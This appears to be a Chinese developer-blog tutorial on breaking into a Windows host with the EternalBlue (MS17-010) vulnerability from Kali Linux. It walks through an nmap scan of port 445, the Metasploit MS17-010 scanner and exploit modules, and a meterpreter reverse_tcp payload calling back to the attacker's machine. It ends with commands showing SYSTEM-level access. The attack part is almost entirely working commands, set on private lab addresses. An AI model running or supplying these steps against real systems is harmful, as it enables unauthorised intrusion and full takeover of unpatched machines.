热门标签 | HotTags
当前位置:  开发笔记 > 后端 > 正文

关于kali利用永恒之蓝漏洞入侵windows主机

1.探测目标主机系统及445端口是否开放nmap-sV-T4192.168.205.200 下图可以看到windos已开启445端口 2.打开kali的渗透测试工具Metasplo

1. 探测目标主机系统及445端口是否开放

nmap -sV -T4 192.168.205.200

  下图可以看到windos已开启445端口

 2. 打开kali的渗透测试工具Metasploit

msfconsole  

 3. 搜索永恒之蓝漏洞名

search smb_ms17_010

   使用此模块,并设置被攻击主机IP

use auxiliary/scanner/smb/smb_ms17_010
show options

设置被攻击的主机IP

set RHOSTS 192.168.205.200

 4. 运行看是否存在永恒之蓝漏洞(下图显示目标主机存在此漏洞)

run

 5. 使用攻击模块设置被攻击主机IP

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.205.200

 6. 设置攻击载荷(kali所在主机IP及监听端口

# 攻击载荷
set payload windows/x64/meterpreter/reverse_tcp
# 攻击机IP(kali主机)
set lhost 192.168.205.173
# 攻击机监听端口
set lport 6666
# 查看设置的参数
show options

 7. 执行攻击命令(下图显示已经入侵到windows系统)

exploit

可以使用?查看帮助命令

sysinfo # 系统相关信息
getuid # 查看当前用户身份权限,下图可以看到已取得了系统级别权限 

 8. 可以使用像linux一样的命令查看,切换目录

 

 

 

  

  

 

 

  

  

 



推荐阅读
  • 本文将介绍如何编写一些有趣的VBScript脚本,这些脚本可以在朋友之间进行无害的恶作剧。通过简单的代码示例,帮助您了解VBScript的基本语法和功能。 ... [详细]
  • 在 Windows 10 中,F1 至 F12 键默认设置为快捷功能键。本文将介绍几种有效方法来禁用这些快捷键,并恢复其标准功能键的作用。请注意,部分笔记本电脑的快捷键可能无法完全关闭。 ... [详细]
  • 本文总结了2018年的关键成就,包括职业变动、购车、考取驾照等重要事件,并分享了读书、工作、家庭和朋友方面的感悟。同时,展望2019年,制定了健康、软实力提升和技术学习的具体目标。 ... [详细]
  • 本文详细介绍如何使用Python进行配置文件的读写操作,涵盖常见的配置文件格式(如INI、JSON、TOML和YAML),并提供具体的代码示例。 ... [详细]
  • 在计算机技术的学习道路上,51CTO学院以其专业性和专注度给我留下了深刻印象。从2012年接触计算机到2014年开始系统学习网络技术和安全领域,51CTO学院始终是我信赖的学习平台。 ... [详细]
  • CSS 布局:液态三栏混合宽度布局
    本文介绍了如何使用 CSS 实现液态的三栏布局,其中各栏具有不同的宽度设置。通过调整容器和内容区域的属性,可以实现灵活且响应式的网页设计。 ... [详细]
  • Linux 系统启动故障排除指南:MBR 和 GRUB 问题
    本文详细介绍了 Linux 系统启动过程中常见的 MBR 扇区和 GRUB 引导程序故障及其解决方案,涵盖从备份、模拟故障到恢复的具体步骤。 ... [详细]
  • 本文介绍了如何使用jQuery根据元素的类型(如复选框)和标签名(如段落)来获取DOM对象。这有助于更高效地操作网页中的特定元素。 ... [详细]
  • 1:有如下一段程序:packagea.b.c;publicclassTest{privatestaticinti0;publicintgetNext(){return ... [详细]
  • 深入理解Cookie与Session会话管理
    本文详细介绍了如何通过HTTP响应和请求处理浏览器的Cookie信息,以及如何创建、设置和管理Cookie。同时探讨了会话跟踪技术中的Session机制,解释其原理及应用场景。 ... [详细]
  • 本文介绍如何在 Xcode 中使用快捷键和菜单命令对多行代码进行缩进,包括右缩进和左缩进的具体操作方法。 ... [详细]
  • 介绍一个提供正版Windows软件下载的权威网站,确保用户能够安全合法地获取所需软件。 ... [详细]
  • c# – UWP:BrightnessOverride StartOverride逻辑 ... [详细]
  • 优化版Windows 10 LTSC 21H2企业版:适用于低内存设备
    此版本为经过优化的Windows 10 LTSC 21H2企业版,特别适合低内存配置的计算机。它基于官方版本进行了精简和性能优化,确保在资源有限的情况下依然能够稳定运行。 ... [详细]
  • 随着网络安全威胁的不断演变,电子邮件系统成为攻击者频繁利用的目标。本文详细探讨了电子邮件系统中的常见漏洞及其潜在风险,并提供了专业的防护建议。 ... [详细]
author-avatar
君奇均政29
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有